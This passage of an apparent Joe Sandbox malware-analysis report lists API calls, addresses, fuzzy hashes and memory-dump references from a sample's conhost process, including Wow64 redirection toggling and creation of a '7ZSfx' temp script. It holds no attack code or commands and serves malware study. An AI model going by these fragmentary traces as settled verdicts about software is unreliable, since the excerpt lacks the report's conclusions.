                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFE04FF25052156BC6008FA5AC84C5BBBADEAC8356B540877F700E3112E735D8198BA6
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00407200,00000000,?,?), ref: 004026BE
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004026C5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                                                                                                                                                                                          • API String ID: 2574300362-3900151262
                                                                                                                                                                                                                                          • Opcode ID: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                                                                                                                                                                                          • Instruction ID: 82409627fcb45dd1da2fa5f3e3d8c344d82775180731f09fcf798d9da7421b86
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3995c828ef5ea128a58b39da0bfb34db2680510550d7971d05a4d895e470ae21
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4D0A7B4593608ABD7001B62EE0CFE276A56B40701F4480356400E00F0CBFD44D1CE1E
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,00402735,?,0040713A,?,00000000,?,?), ref: 004026F0
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004026F7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                                                                                                                                                                                          • API String ID: 2574300362-736604160
                                                                                                                                                                                                                                          • Opcode ID: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                                                                                                                                                                                          • Instruction ID: 4151df8360ba703b2413aa493284ccd41186626ab8f45a3e4bc2e954db12d2dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f4a940be1505b68c475d95e46af471e523fc035b46ed24cc81ed57c5cf537299
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7D0C9B86936046AD6505BA6AD0DFE6B6A4AB80B02F9880296804E11E1C6FC4491DA2F
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00405CDB,00405CDB,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?,00000000), ref: 004031D2
                                                                                                                                                                                                                                            • Part of subcall function 00402DCE: MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,00000000,00000000,00403130,?,?,00000000,00000000,00000000), ref: 00402E00
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB,?), ref: 0040313F
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00405CDB), ref: 0040315A
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00403162
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@$ByteCharMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1731127917-0
                                                                                                                                                                                                                                          • Opcode ID: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                                                                                                                                                                                          • Instruction ID: 048da0cb2dc02d8916bdec43440a285b354a653a086483b302c5f7621bf0cf9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2045a8c988effd66839eecf1b1e0e6c37eff9953a9d0c56656d8fdf52f7b1370
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD31F672804109AACB14EFA6DC829EF77BCEF04315B10443FF856B61E1EB3C9A45C668
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00407468,00000000,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048C6
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,004057F7,?,7ZSfx%03x.cmd), ref: 004048E3
                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 00404919
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00404934
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1746483863-0
                                                                                                                                                                                                                                          • Opcode ID: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                                                                                                                                                                                          • Instruction ID: 9a23dce76bf07ec62893e724c666a97d340ece38cae1712c454cfb59cab589fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6dd081e242313139652bdc03ce0b2f176d2a7b6371b1423e210ce58af9a7749
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5911E772200204BFD7119F55C845BAEB7B9FF84314F10842EF905D72E1DB79A9118B98
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _CxxThrowException.MSVCRT(00100EC3,0041C670), ref: 00412748
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000004,00000000,0041E3DC,?,?,00412815,00000000,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 00412770
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000004,00000000,0041E3DC,?,?,00412815,00000000,0041640F,0041E3DC,004035F5,00000000,?,00405789,?), ref: 00412799
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,0041E3DC,?,?,00412815,00000000,0041640F,0041E3DC,004035F5,00000000,?,00405789,?,00405D01,?), ref: 004127A4
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462485524-0
                                                                                                                                                                                                                                          • Opcode ID: bc4bb84ff43691fde1c3e3b822c17665bb73cff9c6de9501f1a69948c491aa6e
                                                                                                                                                                                                                                          • Instruction ID: 510514d82056c6b4fcd5a552fda661d2aed45214d42cdecf77f9d3eca8f48bd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc4bb84ff43691fde1c3e3b822c17665bb73cff9c6de9501f1a69948c491aa6e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F110876200300ABCB289F16DAC0C9BF7EAAB84350720883FF569D7680C7B9ECD54758
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00407920: GetDlgItem.USER32(?,?), ref: 0040792C
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: GetDlgItem.USER32(?,?), ref: 0040794A
                                                                                                                                                                                                                                            • Part of subcall function 0040793D: ShowWindow.USER32(00000000,?), ref: 00407961
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091EF
                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040920F
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B7), ref: 00409222
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000FC,Function_00007F86), ref: 00409230
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409240), ref: 00408E9F
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: LoadIconW.USER32(00000000), ref: 00408EA2
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000032), ref: 00408EB6
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetSystemMetrics.USER32(00000031), ref: 00408EBB
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409240), ref: 00408EC4
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: LoadImageW.USER32(00000000), ref: 00408EC7
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EE7
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408EF0
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F0C
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B2), ref: 00408F16
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F22
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F31
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F3F
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetDlgItem.USER32(?,000004B5), ref: 00408F4D
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: GetWindowLongW.USER32(?,000000F0), ref: 00408F59
                                                                                                                                                                                                                                            • Part of subcall function 00408E76: SetWindowLongW.USER32(?,000000F0,00000000), ref: 00408F68
                                                                                                                                                                                                                                            • Part of subcall function 004082F3: GetDlgItem.USER32(?,000004B6), ref: 00408300
                                                                                                                                                                                                                                            • Part of subcall function 004082F3: SetFocus.USER32(00000000,?,?,004083E7,000004B6,?), ref: 00408307
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3043669009-0
                                                                                                                                                                                                                                          • Opcode ID: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                                                                                                                                                                                          • Instruction ID: 3591c2bc138905537439c0aaf451187a84050bff03ea83390e11aea9625765cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f423f1c94b217a71c22aa920f9295f7036f4086fcedb7640a741d3f85b4acc7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911C271F40314ABDB10EBA99D09F9A77BCAB84B04F00446FB241E32D1CAB899008B59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00407825
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000031), ref: 0040784B
                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040785A
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00407889
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1900162674-0
                                                                                                                                                                                                                                          • Opcode ID: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                                                                                                                                                                                          • Instruction ID: b25c457bbae17dd5d72c6f892d860256fe40de5a44a36179f6bad400e189aa1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da47058ff94d5803732122388ffcc42587bfddbb95a0ced26d5b12eadc4e772
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4116376A00205AFDB149F54DC88BEAB7B8EB04304F0480AAED05A7391DB74AE40CB55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00408D3B
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00408D4D
                                                                                                                                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00408D5C
                                                                                                                                                                                                                                            • Part of subcall function 00408763: KillTimer.USER32(?,00000001,?,00408D71), ref: 00408771
                                                                                                                                                                                                                                          • CallNextHookEx.USER32(?,?,?), ref: 00408D7E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClientRect$CallHookKillNextScreenTimer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3015594791-0
                                                                                                                                                                                                                                          • Opcode ID: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                                                                                                                                                                                          • Instruction ID: 5f24f27530ec3351cfe61c109b9f8109a002e7470ac3ae9da68eaa6329551e7b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c0142bb5449cde29fe80b00b0c8c4aeb037efaebdbf96b535f10bbdd551267
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23016D35101109EFDF109F55ED48EEA7BA6FF14384B18C53EF845A26A0EB35E850DB19
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004033E0: GetWindowTextLengthW.USER32(?), ref: 004033F1
                                                                                                                                                                                                                                            • Part of subcall function 004033E0: GetWindowTextW.USER32(j4@,00000000,00000001), ref: 0040340E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0041A834,0041A83C), ref: 0040445E
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041A834,0041A83C), ref: 00404466
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00404473
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040447E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??3@TextWindow$Length
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2308334395-0
                                                                                                                                                                                                                                          • Opcode ID: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                                                                                                                                                                                          • Instruction ID: 3481eafec51d8512e57604988f767cc9cc3c1553ab35ab675722db7162792d52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 946fc21653a0a68691e606a30467c9a675c099ea4abd451042eb9ca157acbde2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31F0FF76D04108BACF05BBA2DD46CDDBB7CEF18348F1040AAF50171091EA799B958B94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetObjectW.GDI32(?,0000005C,?), ref: 00408094
                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 004080AA
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 004080BE
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004080CA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFontIndirectItemMessageObjectSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2001801573-0
                                                                                                                                                                                                                                          • Opcode ID: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                                                                                                                                                                                          • Instruction ID: 956e92ef37cd049c126208e7095bac86b33f3b6997e338fc061b002d9265881b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 264c581feac235bf5db38c3df5d80af8d6bc45eebf8f891e465c2a489f60d106
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00F0BE71501708AFDB215BA4DD09FCBBBACAB88B01F048039FA41E22D0DBB4E4148A29
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00420B90), ref: 0040B989
                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00420B90), ref: 0040B9CC
                                                                                                                                                                                                                                            • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B824
                                                                                                                                                                                                                                            • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT ref: 0040B866
                                                                                                                                                                                                                                            • Part of subcall function 0040B7A0: ??2@YAPAXI@Z.MSVCRT(?,0000001F), ref: 0040B87C
                                                                                                                                                                                                                                            • Part of subcall function 0040B7A0: memmove.MSVCRT(00000000,?,?,?,0000001F), ref: 0040B899
                                                                                                                                                                                                                                            • Part of subcall function 0040B7A0: ??3@YAXPAX@Z.MSVCRT(?,?,0000001F), ref: 0040B8A6
                                                                                                                                                                                                                                            • Part of subcall function 0040B7A0: memmove.MSVCRT(?,?,?,?,?,0000001F), ref: 0040B8C4
                                                                                                                                                                                                                                            • Part of subcall function 0040AEE0: memset.MSVCRT ref: 0040AF4D
                                                                                                                                                                                                                                            • Part of subcall function 0040B910: ??2@YAPAXI@Z.MSVCRT(00000044), ref: 0040B937
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$??3@CriticalSectionmemmove$EnterLeavememset
                                                                                                                                                                                                                                          • String ID: $A$$A
                                                                                                                                                                                                                                          • API String ID: 2633840989-464203494
                                                                                                                                                                                                                                          • Opcode ID: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                                                                                                                                                                                          • Instruction ID: 6d2d4446e2632278ac84d03e88f46c99b33c2e18b0b42c59bf91942fc9617b32
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678182a7b1fb41f2735d9a1324951dca02cc2b15f86711d7f43aa98ef369e29f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E0927431112516892437566C15AFE1B9ACEC5348B00043FF701732C3CFAD299642EE
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00402088
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004020A1
                                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 004020AF
                                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 004020B6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2318993316.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2318973646.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319024951.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319051131.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2319084207.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_conhost.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2099118873-0
                                                                                                                                                                                                                                          • Opcode ID: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
                                                                                                                                                                                                                                          • Instruction ID: 302afeb31cedc52bf97cb9c1a24104c68e6dc93ac8c9cb6ce1a7b953da425052
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1e4db117b574ef1589c0c9d55717d3f19d7559ec2b1b8ce9c9335790e320de4
